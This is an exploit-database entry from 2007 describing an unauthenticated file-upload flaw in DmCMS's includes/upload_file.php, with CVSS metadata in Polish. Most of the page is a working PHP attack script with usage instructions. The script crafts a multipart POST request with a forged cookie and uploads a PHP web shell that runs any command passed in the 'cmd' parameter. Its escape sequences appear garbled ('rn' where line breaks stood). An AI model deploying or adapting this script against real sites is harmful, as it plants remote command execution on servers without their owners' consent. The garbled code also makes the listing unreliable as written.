DmCMS Shell Uploading

2007.04.26
Credit: HACKERS PAL
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

Hello Title : DmCMS Shell Upload Discovered by : HACKERS PAL Copyrights : HACKERS PAL Website : WwW.SoQoR.NeT Email : security (at) soqor (dot) net [email concealed] File .. includes/upload_file.php After Giving Some conditions will allow you to upload any file you want the exploit here is the proof .. exploit : #!/usr/bin/php -q -d short_open_tag=on <? /* /* DmCMS Shell Uploading /* This exploit should allow you to execute commands /* By : HACKERS PAL /* WwW.SoQoR.NeT */ echo(' /**********************************************/ /* DmCMS Shell Uploading */ /* by HACKERS PAL <security (at) soqor (dot) net [email concealed]> */ /* site: http://www.soqor.net */'); if ($argc<4) { print_r(' /* -- */ /* Usage: php '.$argv[0].' host path topath /* Example: */ /* php '.$argv[0].' localhost /dmcms/ ../media/ /**********************************************/ '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); Function get_page($url) { if(function_exists("file_get_contents")) { $contents = file_get_contents($url); } else { $fp=fopen("$url","r"); while($line=fread($fp,1024)) { $contents=$contents.$line; } } return $contents; } function connect($packet) { global $host, $port, $html; $con=fsockopen(gethostbyname($host),$port); if (!$con) { echo '[-] Error - No response from '.$host.':'.$port; die; } fputs($con,$packet); $html=''; while ((!feof($con)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($con,1); } GLOBAL $html; fclose($con); } $i=0; $data=""; function add_data($name,$value,$type="no",$filename) { GLOBAL $data,$i; if($type=="file") { $data.="-----------------------------7d62702f250530 Content-Disposition: form-data; name="$filename"; filename="$name"; Content-Type: text/plain $value "; } elseif($type=="init") { $data.="-----------------------------7d62702f250530--"; } elseif($type=="clean") { $data=""; } else { $data.="-----------------------------7d62702f250530 Content-Disposition: form-data; name="$name"; Content-Type: text/plain $value "; } } $host=$argv[1]; $path=$argv[2]; $default_path=$argv[3]; $port=80; $cmd=urlencode($cmd); $p='http://'.$host.':'.$port.$path; Echo "n[+] Trying to Upload File"; $cookie="Master=HACKERS20%PAL"; $contents='<?php $cmd=($_GET[cmd])?$_GET[cmd]:$_POST[cmd]; system($cmd); ?>'; add_data("empty.php","","file","File1"); add_data("soqor.php",$contents,"file","File2"); add_data("soqor.php",$contents,"file","File3"); add_data('','',"init"); $packet="POST ".$p."includes/upload_file.php?default_path=$default_path HTTP/1.0rn"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn"; $packet.="Referer: http://".$host.$path."ok.php?do=actrn"; $packet.="Accept-Language: itrn"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530rn"; $packet.="Accept-Encoding: gzip, deflatern"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)rn"; $packet.="Host: ".$host."rn"; $packet.="Content-Length: ".strlen($data)."rn"; $packet.="Connection: Closern"; $packet.="Cache-Control: no-cachern"; $packet.="Cookie: ".$cookie."rnrn"; $packet.=$data; connect($packet); if (!eregi($default_path,$html)) { echo"n/* [+] Successfully Exploited"; } echo ("n/* Visit us : WwW.SoQoR.NeT */n/**********************************************/"); ?> #WwW.SoQoR.NeT


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top